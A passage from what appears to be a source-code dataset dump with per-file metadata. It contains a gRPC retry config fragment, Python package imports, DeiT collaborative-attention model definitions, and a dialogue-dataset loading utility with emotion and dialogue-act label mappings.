                "idempotent": ["DEADLINE_EXCEEDED", "UNAVAILABLE"],
                "non_idempotent": [],
            },
            "retry_params": {
                "default": {
                    "initial_retry_delay_millis": 100,
                    "retry_delay_multiplier": 1.3,
                    "max_retry_delay_millis": 60000,
                    "initial_rpc_timeout_millis": 20000,
                    "rpc_timeout_multiplier": 1.0,
                    "max_rpc_timeout_millis": 20000,
                    "total_timeout_millis": 600000,
                }
            },
            "methods": {
                name: _method_entry(codes) for name, codes in _METHOD_RETRY_CLASSES
            },
        }
    }
}
| 40.86413
| 67
| 0.419604
| 457
| 7,519
| 6.461707
| 0.142232
| 0.154081
| 0.234677
| 0.249238
| 0.71385
| 0.71385
| 0.71385
| 0.71385
| 0.71385
| 0.71385
| 0
| 0.04815
| 0.475196
| 7,519
| 183
| 68
| 41.087432
| 0.700203
| 0
| 0
| 0.52459
| 0
| 0
| 0.394334
| 0.052002
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
452db20c733b0825950ef1c7a37f9b5e22b73b56
| 73
|
py
|
Python
|
Prediction_Utils/Classification/__init__.py
|
xinyuwang1209/Prediction_Utils
|
a6ff6ec74c8fbdfe4013c760da361ad5b7447651
|
[
"MIT"
] | null | null | null |
Prediction_Utils/Classification/__init__.py
|
xinyuwang1209/Prediction_Utils
|
a6ff6ec74c8fbdfe4013c760da361ad5b7447651
|
[
"MIT"
] | null | null | null |
Prediction_Utils/Classification/__init__.py
|
xinyuwang1209/Prediction_Utils
|
a6ff6ec74c8fbdfe4013c760da361ad5b7447651
|
[
"MIT"
] | null | null | null |
from ._use_lasso import *
from ._use_svc import *
from ._use_rf import *
| 18.25
| 25
| 0.753425
| 12
| 73
| 4.083333
| 0.5
| 0.428571
| 0.530612
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.164384
| 73
| 3
| 26
| 24.333333
| 0.803279
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
188677663c76591fa29f6fc7ae4fdfdaeb14cb08
| 11,935
|
py
|
Python
|
models.py
|
jbcdnr/deit-collaborative-attention
|
07905829be28eac1277cbc0255796feeab589bfc
|
[
"Apache-2.0"
] | null | null | null |
models.py
|
jbcdnr/deit-collaborative-attention
|
07905829be28eac1277cbc0255796feeab589bfc
|
[
"Apache-2.0"
] | null | null | null |
models.py
|
jbcdnr/deit-collaborative-attention
|
07905829be28eac1277cbc0255796feeab589bfc
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) 2015-present, Facebook, Inc.
# All rights reserved.
from mmap import MAP_PRIVATE
import torch
import torch.nn as nn
from functools import partial
import pathlib
from timm.models.vision_transformer import VisionTransformer, _cfg
from timm.models.registry import register_model
import collaborate_attention
@register_model
def deit_tiny_patch16_224(pretrained=False, **kwargs):
    """DeiT-Tiny (patch 16, 224x224): 12 blocks, embed dim 192, 3 heads.

    If *pretrained*, weights are downloaded from the official DeiT release.
    """
    vit = VisionTransformer(
        patch_size=16,
        embed_dim=192,
        depth=12,
        num_heads=3,
        mlp_ratio=4,
        qkv_bias=True,
        norm_layer=partial(nn.LayerNorm, eps=1e-6),
        **kwargs,
    )
    vit.default_cfg = _cfg()
    if not pretrained:
        return vit
    state = torch.hub.load_state_dict_from_url(
        url="https://dl.fbaipublicfiles.com/deit/deit_tiny_patch16_224-a1311bcf.pth",
        map_location="cpu",
        check_hash=True,
    )
    vit.load_state_dict(state["model"])
    return vit
@register_model
def deit_tiny_colab_patch16_224(pretrained=False, all_key_dim=None, **kwargs):
    """DeiT-Tiny with attention swapped for collaborative attention.

    *all_key_dim* is the shared key dimension passed to the swap.
    NOTE(review): the swap is performed on GPU (`.cuda()` before,
    `.cpu()` after), so this factory appears to require a CUDA device —
    confirm before using on CPU-only hosts.
    """
    vit = VisionTransformer(
        patch_size=16,
        embed_dim=192,
        depth=12,
        num_heads=3,
        mlp_ratio=4,
        qkv_bias=True,
        norm_layer=partial(nn.LayerNorm, eps=1e-6),
        **kwargs,
    )
    vit.default_cfg = _cfg()
    if pretrained:
        state = torch.hub.load_state_dict_from_url(
            url="https://dl.fbaipublicfiles.com/deit/deit_tiny_patch16_224-a1311bcf.pth",
            map_location="cpu",
            check_hash=True,
        )
        vit.load_state_dict(state["model"])
    vit.cuda()
    collaborate_attention.swap(vit, all_key_dim)
    vit.cpu()
    return vit
@register_model
def deit_small_patch16_224(pretrained=False, **kwargs):
    """DeiT-Small (patch 16, 224x224): 12 blocks, embed dim 384, 6 heads.

    If *pretrained*, weights are downloaded from the official DeiT release.
    """
    vit = VisionTransformer(
        patch_size=16,
        embed_dim=384,
        depth=12,
        num_heads=6,
        mlp_ratio=4,
        qkv_bias=True,
        norm_layer=partial(nn.LayerNorm, eps=1e-6),
        **kwargs,
    )
    vit.default_cfg = _cfg()
    if not pretrained:
        return vit
    state = torch.hub.load_state_dict_from_url(
        url="https://dl.fbaipublicfiles.com/deit/deit_small_patch16_224-cd65a155.pth",
        map_location="cpu",
        check_hash=True,
    )
    vit.load_state_dict(state["model"])
    return vit
@register_model
def deit_base_patch16_224(pretrained=False, **kwargs):
    """DeiT-Base (patch 16, 224x224): 12 blocks, embed dim 768, 12 heads.

    If *pretrained*, weights are downloaded from the official DeiT release.
    """
    vit = VisionTransformer(
        patch_size=16,
        embed_dim=768,
        depth=12,
        num_heads=12,
        mlp_ratio=4,
        qkv_bias=True,
        norm_layer=partial(nn.LayerNorm, eps=1e-6),
        **kwargs,
    )
    vit.default_cfg = _cfg()
    if not pretrained:
        return vit
    state = torch.hub.load_state_dict_from_url(
        url="https://dl.fbaipublicfiles.com/deit/deit_base_patch16_224-b5f2ef4d.pth",
        map_location="cpu",
        check_hash=True,
    )
    vit.load_state_dict(state["model"])
    return vit
@register_model
def deit_base_patch16_224_collab384(pretrained=False, **kwargs):
    """DeiT-Base with collaborative attention, compressed key dim 384.

    NOTE(review): the *pretrained* flag is accepted but never used here —
    no checkpoint is ever loaded; confirm whether that is intentional.
    """
    vit = VisionTransformer(
        patch_size=16,
        embed_dim=768,
        depth=12,
        num_heads=12,
        mlp_ratio=4,
        qkv_bias=True,
        norm_layer=partial(nn.LayerNorm, eps=1e-6),
        **kwargs,
    )
    vit.default_cfg = _cfg()
    collaborate_attention.swap(vit, compressed_key_dim=384, reparametrize=False)
    return vit
@register_model
def deit_base_patch16_224_collab256(pretrained=False, **kwargs):
    """DeiT-Base with collaborative attention, compressed key dim 256.

    NOTE(review): the *pretrained* flag is accepted but never used here —
    no checkpoint is ever loaded; confirm whether that is intentional.
    """
    vit = VisionTransformer(
        patch_size=16,
        embed_dim=768,
        depth=12,
        num_heads=12,
        mlp_ratio=4,
        qkv_bias=True,
        norm_layer=partial(nn.LayerNorm, eps=1e-6),
        **kwargs,
    )
    vit.default_cfg = _cfg()
    collaborate_attention.swap(vit, compressed_key_dim=256, reparametrize=False)
    return vit
@register_model
def deit_base3_patch16_224(pretrained=False, **kwargs):
    """3-block DeiT-Base (patch 16, 224x224): embed dim 768, 12 heads.

    No pretrained weights exist for this truncated variant, hence the assert.
    """
    vit = VisionTransformer(
        patch_size=16,
        embed_dim=768,
        depth=3,
        num_heads=12,
        mlp_ratio=4,
        qkv_bias=True,
        norm_layer=partial(nn.LayerNorm, eps=1e-6),
        **kwargs,
    )
    vit.default_cfg = _cfg()
    assert not pretrained
    return vit
# ========== REDUCED KEY DIMENSION CONCATENATE ATTENTION MODELS ========== #
@register_model
def deit_base3_patch16_224_key384(pretrained=False, **kwargs):
    """3-block DeiT-Base using FlexibleKeyDimensionAttention, total key dim 384.

    NOTE(review): this rebinds the Attention class globally inside
    timm.models.vision_transformer and never restores it, so any timm
    ViT built later in the same process is affected as well.
    """
    import timm.models.vision_transformer
    from collaborate_attention import FlexibleKeyDimensionAttention

    timm.models.vision_transformer.Attention = partial(FlexibleKeyDimensionAttention, all_key_dim=384)
    vit = VisionTransformer(
        patch_size=16,
        embed_dim=768,
        depth=3,
        num_heads=12,
        mlp_ratio=4,
        qkv_bias=True,
        norm_layer=partial(nn.LayerNorm, eps=1e-6),
        **kwargs,
    )
    vit.default_cfg = _cfg()
    assert not pretrained
    return vit
@register_model
def deit_base3_patch16_224_key192(pretrained=False, **kwargs):
    """3-block DeiT-Base using FlexibleKeyDimensionAttention, total key dim 192.

    NOTE(review): this rebinds the Attention class globally inside
    timm.models.vision_transformer and never restores it, so any timm
    ViT built later in the same process is affected as well.
    """
    import timm.models.vision_transformer
    from collaborate_attention import FlexibleKeyDimensionAttention

    timm.models.vision_transformer.Attention = partial(FlexibleKeyDimensionAttention, all_key_dim=192)
    vit = VisionTransformer(
        patch_size=16,
        embed_dim=768,
        depth=3,
        num_heads=12,
        mlp_ratio=4,
        qkv_bias=True,
        norm_layer=partial(nn.LayerNorm, eps=1e-6),
        **kwargs,
    )
    vit.default_cfg = _cfg()
    assert not pretrained
    return vit
@register_model
def deit_base3_patch16_224_key96(pretrained=False, **kwargs):
    """3-block DeiT-Base using FlexibleKeyDimensionAttention, total key dim 96.

    NOTE(review): this rebinds the Attention class globally inside
    timm.models.vision_transformer and never restores it, so any timm
    ViT built later in the same process is affected as well.
    """
    import timm.models.vision_transformer
    from collaborate_attention import FlexibleKeyDimensionAttention

    timm.models.vision_transformer.Attention = partial(FlexibleKeyDimensionAttention, all_key_dim=96)
    vit = VisionTransformer(
        patch_size=16,
        embed_dim=768,
        depth=3,
        num_heads=12,
        mlp_ratio=4,
        qkv_bias=True,
        norm_layer=partial(nn.LayerNorm, eps=1e-6),
        **kwargs,
    )
    vit.default_cfg = _cfg()
    assert not pretrained
    return vit
# ========== COLLABORATIVE ATTENTION MODELS ========== #
# ========== BASE 3 LAYERS ========== #
@register_model
def deit_base3_patch16_224_collab384(pretrained=False, models_directory="./models", **kwargs):
    """DeiT-Base/3 with collaborative attention, compressed key dimension 384.

    Args:
        pretrained: if True, load weights from
            ``<models_directory>/deit_base3_patch16_224_collab384.pth``.
        models_directory: directory holding the checkpoint files. Defaults to
            "./models" for consistency with the other collab models (the
            original default of None crashed ``pathlib.Path`` when
            ``pretrained=True`` was used without an explicit directory).
    """
    model = VisionTransformer(
        patch_size=16,
        embed_dim=768,
        depth=3,
        num_heads=12,
        mlp_ratio=4,
        qkv_bias=True,
        norm_layer=partial(nn.LayerNorm, eps=1e-6),
        **kwargs,
    )
    # Swap the stock attention modules for collaborative attention in place.
    collaborate_attention.swap(model, compressed_key_dim=384, reparametrize=False)
    model.default_cfg = _cfg()
    if pretrained:
        checkpoint_path = pathlib.Path(models_directory) / "deit_base3_patch16_224_collab384.pth"
        print(f"Load model from '{checkpoint_path}'")
        checkpoint = torch.load(checkpoint_path, map_location="cpu")
        model.load_state_dict(checkpoint["model"])
    return model
@register_model
def deit_base3_patch16_224_collab192(pretrained=False, models_directory="./models", **kwargs):
    """DeiT-Base/3 with collaborative attention, compressed key dimension 192.

    Args:
        pretrained: if True, load weights from
            ``<models_directory>/deit_base3_patch16_224_collab192.pth``.
        models_directory: directory holding the checkpoint files. Defaults to
            "./models" for consistency with the other collab models (the
            original default of None crashed ``pathlib.Path`` when
            ``pretrained=True`` was used without an explicit directory).
    """
    model = VisionTransformer(
        patch_size=16,
        embed_dim=768,
        depth=3,
        num_heads=12,
        mlp_ratio=4,
        qkv_bias=True,
        norm_layer=partial(nn.LayerNorm, eps=1e-6),
        **kwargs,
    )
    # Swap the stock attention modules for collaborative attention in place.
    collaborate_attention.swap(model, compressed_key_dim=192, reparametrize=False)
    model.default_cfg = _cfg()
    if pretrained:
        checkpoint_path = pathlib.Path(models_directory) / "deit_base3_patch16_224_collab192.pth"
        print(f"Load model from '{checkpoint_path}'")
        checkpoint = torch.load(checkpoint_path, map_location="cpu")
        model.load_state_dict(checkpoint["model"])
    return model
@register_model
def deit_base3_patch16_224_collab96(pretrained=False, models_directory="./models", **kwargs):
    """DeiT-Base/3 with collaborative attention, compressed key dimension 96.

    Args:
        pretrained: if True, load weights from
            ``<models_directory>/deit_base3_patch16_224_collab96.pth``.
        models_directory: directory holding the checkpoint files. Defaults to
            "./models" for consistency with the other collab models (the
            original default of None crashed ``pathlib.Path`` when
            ``pretrained=True`` was used without an explicit directory).
    """
    model = VisionTransformer(
        patch_size=16,
        embed_dim=768,
        depth=3,
        num_heads=12,
        mlp_ratio=4,
        qkv_bias=True,
        norm_layer=partial(nn.LayerNorm, eps=1e-6),
        **kwargs,
    )
    # Swap the stock attention modules for collaborative attention in place.
    collaborate_attention.swap(model, compressed_key_dim=96, reparametrize=False)
    model.default_cfg = _cfg()
    if pretrained:
        checkpoint_path = pathlib.Path(models_directory) / "deit_base3_patch16_224_collab96.pth"
        print(f"Load model from '{checkpoint_path}'")
        checkpoint = torch.load(checkpoint_path, map_location="cpu")
        model.load_state_dict(checkpoint["model"])
    return model
# ========== BASE ========== #
@register_model
def deit_base_patch16_224_collab64(pretrained=False, models_directory="./models", **kwargs):
    """DeiT-Base with collaborative attention, compressed key dimension 64."""
    model = deit_base_patch16_224(pretrained=False)
    collaborate_attention.swap(model, compressed_key_dim=64, reparametrize=False)
    if not pretrained:
        return model
    # Load the fine-tuned collaborative-attention checkpoint from disk.
    checkpoint_path = pathlib.Path(models_directory) / "deit_base_patch16_224_collab64.pth"
    print(f"Load model from '{checkpoint_path}'")
    checkpoint = torch.load(checkpoint_path, map_location="cpu")
    model.load_state_dict(checkpoint["model"])
    return model
@register_model
def deit_base_patch16_224_collab128(pretrained=False, models_directory="./models", **kwargs):
    """DeiT-Base with collaborative attention, compressed key dimension 128."""
    model = deit_base_patch16_224(pretrained=False)
    collaborate_attention.swap(model, compressed_key_dim=128, reparametrize=False)
    if not pretrained:
        return model
    # Load the fine-tuned collaborative-attention checkpoint from disk.
    checkpoint_path = pathlib.Path(models_directory) / "deit_base_patch16_224_collab128.pth"
    print(f"Load model from '{checkpoint_path}'")
    checkpoint = torch.load(checkpoint_path, map_location="cpu")
    model.load_state_dict(checkpoint["model"])
    return model
@register_model
def deit_base_patch16_224_collab256(pretrained=False, models_directory="./models", **kwargs):
    """DeiT-Base with collaborative attention, compressed key dimension 256."""
    model = deit_base_patch16_224(pretrained=False)
    collaborate_attention.swap(model, compressed_key_dim=256, reparametrize=False)
    if not pretrained:
        return model
    # Load the fine-tuned collaborative-attention checkpoint from disk.
    checkpoint_path = pathlib.Path(models_directory) / "deit_base_patch16_224_collab256.pth"
    print(f"Load model from '{checkpoint_path}'")
    checkpoint = torch.load(checkpoint_path, map_location="cpu")
    model.load_state_dict(checkpoint["model"])
    return model
@register_model
def deit_base_patch16_224_collab384(pretrained=False, models_directory="./models", **kwargs):
    """DeiT-Base with collaborative attention, compressed key dimension 384."""
    model = deit_base_patch16_224(pretrained=False)
    collaborate_attention.swap(model, compressed_key_dim=384, reparametrize=False)
    if not pretrained:
        return model
    # Load the fine-tuned collaborative-attention checkpoint from disk.
    checkpoint_path = pathlib.Path(models_directory) / "deit_base_patch16_224_collab384.pth"
    print(f"Load model from '{checkpoint_path}'")
    checkpoint = torch.load(checkpoint_path, map_location="cpu")
    model.load_state_dict(checkpoint["model"])
    return model
@register_model
def deit_base_patch16_224_collab512(pretrained=False, models_directory="./models", **kwargs):
    """DeiT-Base with collaborative attention, compressed key dimension 512."""
    model = deit_base_patch16_224(pretrained=False)
    collaborate_attention.swap(model, compressed_key_dim=512, reparametrize=False)
    if not pretrained:
        return model
    # Load the fine-tuned collaborative-attention checkpoint from disk.
    checkpoint_path = pathlib.Path(models_directory) / "deit_base_patch16_224_collab512.pth"
    print(f"Load model from '{checkpoint_path}'")
    checkpoint = torch.load(checkpoint_path, map_location="cpu")
    model.load_state_dict(checkpoint["model"])
    return model
@register_model
def deit_base_patch16_224_collab768(pretrained=False, models_directory="./models", **kwargs):
    """DeiT-Base with collaborative attention, compressed key dimension 768."""
    model = deit_base_patch16_224(pretrained=False)
    collaborate_attention.swap(model, compressed_key_dim=768, reparametrize=False)
    if not pretrained:
        return model
    # Load the fine-tuned collaborative-attention checkpoint from disk.
    checkpoint_path = pathlib.Path(models_directory) / "deit_base_patch16_224_collab768.pth"
    print(f"Load model from '{checkpoint_path}'")
    checkpoint = torch.load(checkpoint_path, map_location="cpu")
    model.load_state_dict(checkpoint["model"])
    return model
| 32.432065
| 102
| 0.685966
| 1,437
| 11,935
| 5.402923
| 0.085595
| 0.048944
| 0.042504
| 0.051005
| 0.928387
| 0.910227
| 0.906234
| 0.89168
| 0.89168
| 0.886528
| 0
| 0.049825
| 0.209636
| 11,935
| 367
| 103
| 32.520436
| 0.773243
| 0.021366
| 0
| 0.780255
| 0
| 0
| 0.091197
| 0.027085
| 0
| 0
| 0
| 0
| 0.012739
| 1
| 0.06051
| false
| 0
| 0.044586
| 0
| 0.165605
| 0.028662
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7a0aea4fbfd72ec9a93f66e9e4c50718760b2334
| 541
|
py
|
Python
|
schema_registry/serializers/__init__.py
|
abiodunjames/python-schema-registry-client
|
a8fb9e2aca0bf827b71b6ac31ac7cef76ff2059b
|
[
"MIT"
] | 95
|
2019-05-20T06:59:06.000Z
|
2022-03-01T05:30:57.000Z
|
schema_registry/serializers/__init__.py
|
abiodunjames/python-schema-registry-client
|
a8fb9e2aca0bf827b71b6ac31ac7cef76ff2059b
|
[
"MIT"
] | 94
|
2019-05-19T18:36:29.000Z
|
2022-03-30T18:54:52.000Z
|
schema_registry/serializers/__init__.py
|
abiodunjames/python-schema-registry-client
|
a8fb9e2aca0bf827b71b6ac31ac7cef76ff2059b
|
[
"MIT"
] | 41
|
2019-05-20T06:59:33.000Z
|
2022-03-06T16:09:53.000Z
|
from schema_registry.serializers.message_serializer import AvroMessageSerializer # noqa
from schema_registry.serializers.message_serializer import JsonMessageSerializer # noqa
from schema_registry.serializers.message_serializer import MessageSerializer # noqa
from schema_registry.serializers.message_serializer import AsyncAvroMessageSerializer # noqa
from schema_registry.serializers.message_serializer import AsyncJsonMessageSerializer # noqa
from schema_registry.serializers.message_serializer import AsyncMessageSerializer # noqa
| 77.285714
| 93
| 0.889094
| 54
| 541
| 8.685185
| 0.259259
| 0.127932
| 0.230277
| 0.371002
| 0.707889
| 0.707889
| 0.707889
| 0.597015
| 0
| 0
| 0
| 0
| 0.077634
| 541
| 6
| 94
| 90.166667
| 0.93988
| 0.053604
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
7a0fb53d5956d7bbeb30711e8cb03936eb1d4fc6
| 97,601
|
py
|
Python
|
utils/util.py
|
scut-bds/exampe_repo_from_scutbds
|
6528eeb25d6da53dd4f7eb6b92d534631794aa80
|
[
"Apache-2.0"
] | null | null | null |
utils/util.py
|
scut-bds/exampe_repo_from_scutbds
|
6528eeb25d6da53dd4f7eb6b92d534631794aa80
|
[
"Apache-2.0"
] | null | null | null |
utils/util.py
|
scut-bds/exampe_repo_from_scutbds
|
6528eeb25d6da53dd4f7eb6b92d534631794aa80
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# Copyright 2021 South China University of Technology and
# Engineering Research Center of Ministry of Education on Human Body Perception.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# File: util.py
# Used for dataset loading
# Author: Chen Yirong <eeyirongchen@mail.scut.edu.cn>
# Date: 2021.08.30
import os
import re
import math
import json
import torch
import shutil
import collections
import pandas as pd
from os.path import join
from chardet import detect
from itertools import chain
from torch.utils.data import Dataset
from torch.nn.utils.rnn import pad_sequence
from torch.utils.data import DataLoader
# reference: [CDial-GPT/od/](https://github.com/thu-coai/CDial-GPT)
# Special tokens used to delimit turns in the flattened dialogue sequence.
SPECIAL_TOKENS = ["[CLS]", "[SEP]", "[speaker1]", "[speaker2]"]
# Names of the tensors a model batch is expected to contain.
MODEL_INPUTS = ["input_ids", "lm_labels", "token_type_ids"]
# Encoding examples (Chinese tokens are sample utterance characters):
# input_ids: [CLS] [speaker1] 妈 [speaker2] 你 不 要 叫 我 妈 [speaker2] 我 不 是 你 妈 [SEP]
# token_type_ids: [CLS] [DA1 ] Emo1] [DA2 ] [Emo2 ] [DA3 ] [Emo3 ]
# positioning_embedding: 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
# input_ids: [CLS] [speaker1] 妈 [speaker2] 你 不 要 叫 我 妈 [speaker2] 我 不 是 你 妈 [SEP]
# token_type_ids: [CLS] [speaker1] [speaker1] [speaker2] [speaker1 ] [speaker2] [speaker2 ] [speaker2]
# Emotion_embedding: [CLS] [Emo1 ] [Emo2 ] [Emo3 ]
# DA_embedding: [CLS] [DA1 ] [DA2 ] [DA3 ]
# positioning_embedding: 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
# Expected dataset layout on disk:
# dialogue_text data_dir: /home/MMMTD/dialogue_text
# dialogue_video data_dir: /home/MMMTD/dialogue_video
# dialogue_audio data_dir: /home/MMMTD/dialogue_audio
# Dialogue-act label tokens added to the tokenizer vocabulary.
DA_TOKENS = ["[greeting]","[question]","[answer]","[statement-opinion]","[statement-non-opinion]","[apology]",
             "[command]","[agreement]","[disagreement]","[acknowledge]","[appreciation]","[interjection]",
             "[conventional-closing]","[quotation]","[reject]","[irony]","[comfort]","[thanking]","[da-other]"] # 19 DA labels
SENTIMENT_TOKENS = ["[neutral]","[positive]","[negative]"]
EMOTION_TOKENS = ["[happy]","[grateful]","[relaxed]","[positive-other]","[anger]","[sadness]","[fear]",
                  "[depress]","[disgust]","[astonished]","[worried]","[negative-other]","[neutral]"] # 13 emotion labels
# NOTE(review): only one base-emotion token is defined here, yet the Dataset
# classes below set emotion_size = 7 for "BaseEmotion" — confirm intent.
BASEEMOTION_TOKENS = ["[happy]"]
# Label string -> special-token string mappings.
DA_TO_TOKENS = {'greeting': '[greeting]', 'question': '[question]', 'answer': '[answer]',
                'statement-opinion': '[statement-opinion]', 'statement-non-opinion': '[statement-non-opinion]',
                'apology': '[apology]', 'command': '[command]', 'agreement': '[agreement]',
                'disagreement': '[disagreement]', 'acknowledge': '[acknowledge]', 'appreciation': '[appreciation]',
                'interjection': '[interjection]', 'conventional-closing': '[conventional-closing]',
                'quotation': '[quotation]', 'reject': '[reject]', 'irony': '[irony]',
                'comfort': '[comfort]','thanking':'[thanking]', 'other': '[da-other]'}
SENTIMENT_TO_TOKENS = {'neutral': '[neutral]', 'positive': '[positive]', 'negative': '[negative]'}
EMOTION_TO_TOKENS = {'happy': '[happy]', 'grateful': '[grateful]', 'relaxed': '[relaxed]',
                     'positive-other': '[positive-other]', 'anger': '[anger]', 'sadness': '[sadness]',
                     'fear': '[fear]', 'depress': '[depress]', 'disgust': '[disgust]',
                     'astonished': '[astonished]', 'worried': '[worried]', 'negative-other': '[negative-other]',
                     'neutral': '[neutral]'}
BASEEMOTION_TO_TOKENS = {"happy":'[happy]'}
AGEGROUP_TO_TOKENS = {"young":"young","middle-aged":"middle-aged","elderly":"elderly","teenager":"teenager","children":"children","unknown":"unknown"}
# Label string -> integer class id mappings, for BERT ERC and DAC heads.
DA_TO_ID = {'greeting': 0, 'question': 1, 'answer': 2, 'statement-opinion': 3, 'statement-non-opinion': 4,
            'apology': 5, 'command': 6, 'agreement': 7, 'disagreement': 8, 'acknowledge': 9, 'appreciation': 10,
            'interjection': 11, 'conventional-closing': 12, 'quotation': 13, 'reject': 14, 'irony': 15,
            'comfort': 16,'thanking':17, 'other': 18}
EMOTION_TO_ID = {'happy': 0, 'grateful': 1, 'relaxed': 2, 'positive-other': 3, 'anger': 4, 'sadness': 5,
                 'fear': 6, 'depress': 7, 'disgust': 8, 'astonished': 9, 'worried': 10,
                 'negative-other': 11, 'neutral': 12}
GENDER_TO_ID = {'female': 0, 'unknown': 1, 'male': 2}
BIGFIVE_TO_ID = {'low': 0, 'unknown': 1, 'high': 2}
def get_data(args, tokenizer, data_path, logger):
    '''get_data
    Get .csv format dataset from data_path.

    Reads the dialogue CSV, tokenizes every utterance with `tokenizer`, and
    stores the resulting id lists in a new "Token" column.

    Args:
        args: unused here (kept for call-site compatibility).
        tokenizer: a HuggingFace-style tokenizer with `tokenize` and
            `convert_tokens_to_ids` — assumed; confirm against callers.
        data_path: path to the CSV file (UTF-8 with BOM).
        logger: logger used for progress messages.

    Returns:
        (data, samples): the full tokenized DataFrame and the first 30 rows.
    '''
    logger.info("Read dataset from %s", data_path)
    data = pd.read_csv(data_path,
                       usecols=["Dialogue_ID","Utterance_ID","Speaker","Sentiment","Emotion","DA","Utterance","Gender","Age","Neuroticism","Extraversion","Openness","Agreeableness","Conscientiousness"],
                       encoding="UTF-8-SIG")
    # TODO: add a base-emotion column derived from the "Emotion" column.
    # NOTE(review): currently an identity function — placeholder, never applied.
    def createbaseemotion(emotion):
        new_emotion = emotion
        return new_emotion
    # data["BaseEmotion"] = [createbaseemotion(s) for s in data["Emotion"]]
    # NOTE(review): hard-coded 30-row sample — looks like a debugging subset.
    samples = data.iloc[0:30]
    logger.info("Start tokenizing and encoding the dataset")
    def tokenize(utterance):
        # Heuristically restore punctuation: subtitles lack it, so append a
        # question mark after question particles and an exclamation mark after
        # exclamatory particles (full-width), then collapse duplicates.
        utterance = str(utterance) # ensure str type
        # add a question mark after question particles
        utterance = utterance.replace("吗", "吗?")
        utterance = utterance.replace("??", "?")
        # add an exclamation mark after exclamatory particles
        utterance = utterance.replace("啊", "啊!")
        utterance = utterance.replace("吧", "吧!")
        utterance = utterance.replace("啦", "啦!")
        utterance = utterance.replace("呀", "呀!")
        utterance = utterance.replace("!!", "!")
        # replace mid-sentence spaces with commas
        utterance = utterance.replace(" ", ",")
        # remove remaining whitespace
        utterance = utterance.split() # NOTE(review): split() returns a LIST of chunks, not a string
        utt_list = list(utterance) # NOTE(review): list() of a list is a copy — the inline example below
                                   # (per-character split) does not match what this code actually does
        utterance = ' '.join(utt_list) # joins the whitespace-separated chunks with single spaces
        return tokenizer.convert_tokens_to_ids(tokenizer.tokenize(utterance))
    data["Token"] = [tokenize(s) for s in data["Utterance"]]
    logger.info("Finished tokenizing and encoding the dataset")
    return data, samples
def convert_EMOTION_TO_TOKENS(emotion_list, emotion_type):
    """Map raw emotion labels to their special-token strings.

    Args:
        emotion_list: iterable of label strings (e.g. "neutral", "anger").
        emotion_type: "Sentiment" or "BaseEmotion"; any other value selects
            the full "Emotion" label set.

    Returns:
        list of token strings; labels missing from the selected mapping
        become "[UNK]".
    """
    # Bug fix: the original tested membership in SENTIMENT_TO_TOKENS in every
    # branch but then indexed BASEEMOTION_TO_TOKENS / EMOTION_TO_TOKENS, so
    # valid emotion labels (e.g. "anger") were mapped to "[UNK]" and
    # sentiment-only labels (e.g. "positive") raised KeyError.
    if emotion_type == "Sentiment":
        mapping = SENTIMENT_TO_TOKENS
    elif emotion_type == "BaseEmotion":
        mapping = BASEEMOTION_TO_TOKENS
    else:  # "Emotion"
        mapping = EMOTION_TO_TOKENS
    return [mapping.get(emo, "[UNK]") for emo in emotion_list]
def convert_DA_TO_TOKENS(da_list):
    """Translate each dialogue-act label into its special-token string."""
    return [DA_TO_TOKENS[da] for da in da_list]
def create_speaker(speaker_list):
    """Map speaker names to "[speaker1]"/"[speaker2]" tokens.

    Whoever utters the first turn becomes "[speaker1]"; every other
    speaker becomes "[speaker2]".
    """
    first = speaker_list[0]
    return ["[speaker1]" if name == first else "[speaker2]"
            for name in speaker_list]
def set_da_in_speaker(da_ids, input_ids, bos, eos, pad, speaker1, speaker2):
    """Keep each DA id only where the input token is a special token.

    Positions whose input token is not bos/eos/speaker1/speaker2 get ``pad``.
    """
    specials = {bos, eos, speaker1, speaker2}
    return [da_ids[i] if input_ids[i] in specials else pad
            for i in range(len(da_ids))]
def set_emotion_in_speaker(emotion_ids, input_ids, bos, eos, pad, speaker1, speaker2):
    """Keep each emotion id only where the input token is a special token.

    Positions whose input token is not bos/eos/speaker1/speaker2 get ``pad``.
    """
    specials = {bos, eos, speaker1, speaker2}
    return [emotion_ids[i] if input_ids[i] in specials else pad
